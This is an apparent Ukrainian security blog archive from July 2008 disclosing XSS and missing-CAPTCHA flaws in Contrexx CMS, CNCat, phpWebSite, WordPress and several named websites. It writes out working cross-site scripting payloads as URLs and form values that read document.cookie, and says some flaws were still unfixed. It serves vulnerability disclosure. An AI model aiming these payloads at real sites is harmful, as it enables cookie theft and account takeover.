Архів для категорії 'Уразливості'

Уразливості в Contrexx CMS

20:25 17.07.2008

20.06.2008

У жовтні, 30.10.2007, я знайшов Cross-Site Scripting та Insufficient Anti-automation уразливості в системі Contrexx CMS. Як раз коли виявив уразливості на www.astalavista.com, де і використовується цей движок.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

17.07.2008

XSS:

http://site/index.php?section=search&term=%22%20style=%22xss:expression(alert(document.cookie)) (IE)

Insufficient Anti-automation:

На сторінці реєстрації (http://site/index.php?section=community &cmd=register) немає захисту від автоматизованих запитів (капчі).

Уразлива Contrexx CMS 2.0 та попередні версії.

Добірка уразливостей

18:04 16.07.2008

В даній добірці уразливості в веб додатках:

  • QuickTicket multiple sql inj. (деталі)
  • XEForum Cookie Modification Privilege Escalation Vulnerability (деталі)
  • eTicket version 1.5.5 XSS Attack Vulnerability (деталі)
  • eTicket version 1.5.5 Path Disclosure Vulnerability (деталі)
  • DirectAdmin XSS vuln. (деталі)
  • Переповнення буфера в NewsBin Pro (деталі)
  • Information leakage in Scriptsez.net E-Dating System (деталі)
  • Vulnerability in Kamgaing Email System (kmail) (деталі)
  • Directory traversal vulnerability in TinyPHPforum (деталі)
  • Обхід авторизації в IBM DB2 (деталі)

Уразливості в CNCat

23:58 15.07.2008

Ще в 2006 році (одну 16.04.2006, а ще дві 03.08.2006) я знайшов Cross-Site Scripting уразливості в CNCat (каталог лінок). Дірки я виявив на сайті свого друга (і оперативно сповістив його). Також про дані XSS я розповідав, коли писав про уразливості на www.catalog-security.com.ua.

Враховуючи, що уразливості (першу з них) я знайшов ще коли в мене не було даного сайта, в часи коли я почав активно займатися веб безпекою, тому дана інформація в мене дещо відклалася. Про уразливості я найближчим часом повідомлю розробникам системи.

XSS:

Уразливості в add.php (можна як через GET, так і через POST), search.php та index.php.

http://site/add.php?description=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/search.php?q=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/?c=0&o=0%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразлива версія CNCat 2.0 та попередні версії.

Як я сьогодні перевірив, CNCat 2.1 також уразливий - в index.php та для POST запиту в add.php.

XSS:

http://site/?c=0&o=0%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

POST запит на сторінці http://site/add.php
</textarea><script>alert(document.cookie)</script>В полі Описание.

CNCat 4.1 також уразливий ;-) , як я сьогодні перевірив (але в ньому інша уразливість). Про що я напишу окремо.

Уразливість на customize.org

20:36 15.07.2008

01.03.2008

У липні, 28.07.2007, я знайшов Cross-Site Scripting уразливість на проекті http://customize.org. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше.

15.07.2008

XSS:

Дана уразливість досі не виправлена.

Уразливості в phpWebSite

23:51 12.07.2008

Сьогодні я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості в системі phpWebSite. Дірки я виявив на її офіційному сайті http://phpwebsite.appstate.edu. Про що найближчим часом повідомлю розробникам системи.

Insufficient Anti-Automation:

На сторінці реєстрації (http://site/index.php?module=users &action=user&command=signup_user) немає захисту від автоматизованих запитів (капчі).

XSS:

POST запит на сторінці http://site/index.php?module=users &action=user&command=signup_user

"><BODY onload=alert(document.cookie)>В полях: Password і Confirm (разом), Email Address.

XSS через GET:

Уразлива версія phpWebSite 1.5.2 та попередні версії.

Добірка уразливостей

16:28 12.07.2008

В даній добірці уразливості в веб додатках:

Уразливості на grub.org

20:45 11.07.2008

27.02.2008

У липні, 31.07.2007, я знайшов Cross-Site Scripting та Full path disclosure уразливості на проекті http://grub.org (з яким співпрацює Wikia). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

11.07.2008

XSS:

XSS:

POST запит на сторінці http://grub.org/html/users.php?op=lookup
<script>alert(document.cookie)</script>В полі Username.

Full path disclosure:

http://www.grub.org/services/urlstats.php (POST запит)

http://www.grub.org/services/clientstats.php (POST запит)

Дані уразливості вже виправлені (і сайт був повністю перероблений).

Добірка уразливостей

17:20 10.07.2008

В даній добірці уразливості в веб додатках:

  • Joomla/Mambo Jambook v1.0 beta7 Rfi Vuln. (деталі)
  • LS simple guestbook - arbitrary code execution (деталі)
  • Direct static code injection vulnerability in MyBlog (деталі)
  • Authentication bypass in MyBlog (деталі)
  • PHP remote file inclusion vulnerability in Ivan Gallery Script 0.3 (деталі)
  • PHP remote file inclusion vulnerability in Ivan Gallery Script 0.1 (деталі)
  • PHP remote file inclusion vulnerability in Sam Crew MyBlog (деталі)
  • ClickGallery Server vuln. (деталі)
  • access2asp XSS vuln. (деталі)
  • Інклюдинг локальних файлів в Simple Invoices (деталі)

Cross-Site Scripting уразливість в WordPress

23:51 09.07.2008

В березні минулого року була виявлена уразливість міжсайтового скриптінгу в WordPress. Уразливість дозволяє віддаленому користувачу виконати XSS напад.

Вразливим є параметр year в функції wp_title, що виводить заголовок сторінки.

XSS:

http://site/?year=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Вразливі версії WordPress: для 2.0.x до 2.0.10, для 2.1.x до 2.1.3. В нових версіях WP уразливість вже виправлена.

Уразливості на www.webalta.ru

19:37 09.07.2008

26.02.2008

У липні, 24.07.2007, я знайшов Cross-Site Scripting уразливості в пошуковій систем http://www.webalta.ru. Про що найближчим часом сповіщу адміністрацію системи.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

09.07.2008

XSS:

Дані уразливості вже виправлені (бо доступ до пошуку вже не надається без реєстрації). Варто лише не забувати дякувати людям, що піклуються про вашу безпеку.